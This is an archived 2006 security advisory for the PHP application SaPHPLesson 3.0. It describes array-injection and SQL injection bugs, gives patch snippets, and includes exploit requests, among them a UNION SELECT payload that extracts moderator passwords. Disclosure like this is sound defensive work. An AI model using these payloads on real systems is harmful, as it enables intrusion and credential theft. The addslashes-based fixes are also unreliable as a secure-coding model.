|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
Home SecurityAlert Database |
|
|
Topic : | SaPHPLesson 3.0 Multbugs
|
SecurityAlert : 862
CVE : CVE-2006-2279 CVE : CVE-2006-2278
SecurityRisk : Medium (About)
Remote Exploit : Yes
Local Exploit : No
Exploit Available : Yes
Credit : o y 6 hotmail com
Published : 10.05.2006
Affected Software : | SaPHPLesson 3.0 |
 Advisory Content : SaPHPLesson 3.0 Multbugs By :-- D3vil-0x1 | Devil-00 --:
1- Unfilter array
Filename :- show.php
Line :- 102
[code]
$hrow[] = $Row2;[/code]
Fix :-
Add To Line [ 11 ] /show.php This Code :-
we add the code to global to fix all unfilter ver. at the code :)
[code]
$hrow = array();[/code]
Exploit :-
GET ^
/lessons/show.php?lessid=1&hrow=D3vil-0x1
/---------------------------------------------------------/
2- Unfilter array
Filename :- showcat.php
Line :- 80
[code]
$Lsnrow[] = $Row;[/code]
Fix :-
Add To Line [ 11 ] /showcat.php This Code :-
we add the code to global to fix all unfilter ver. at the code :)
[code]
$Lsnrow = array();[/code]
Exploit :-
GET ^
/lessons/showcat.php?forumid=1&Lsnrow=D3vil-0x1
/---------------------------------------------------------/
3- SQL Injection
Filename :- search.php
Line :- MultLines
Fix :-
Line 28 Replace It With
[code]
$Sql = "select * from less,forums where less.Hidden!=1 and BINARY
less.".addslashes($Find)." REGEXP'$Word' and forums.id=less.forumno order
by ".addslashes($Order)." ".addslashes($Trteb)."";[/code]
Line 32 Replace It With
[code]
$Sql = "select * from less,forums where less.Hidden!=1 and BINARY
less.$Find REGEXP'%$Word%' and less.forumno='".addslashes($Cat)."' and
forums.id=less.forumno order by ".addslashes($Order)."
".addslashes($Trteb)."";[/code]
Exploit :-
POST ^
Word=a&Find=lesstitle UNION ALL SELECT
null,null,null,ModName,null,null,null,null,ModPassword,null,null,null,nu
ll,null,null,null,null,null,null,null FROM
modretor/*&Cat=All&Order=lessid&Trteb=DESC
/---------------------------------------------------------/
4- SQL Injection
Filename :- misc.php
Line :- 64
Fix :-
Replace Line 62 & 63 With This Code
[code]
$LID = intval($_GET["LID"]);
$Rate = intval($_POST["Rate"]);[/code]
/---------------------------------------------------------/
5- Unfilter array
Filename :- index.php
Line :- 24
[code]
$rows[] = $Row;[/code]
Fix :-
Add To Line [ 11 ] /index.php This Code :-
we add the code to global to fix all unfilter ver. at the code :)
[code]
$rows = array();
$hrow = array();[/code]
Exploit :-
GET ^
/saphplesson/index.php?rows=D3vil-x01
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|
|
|
|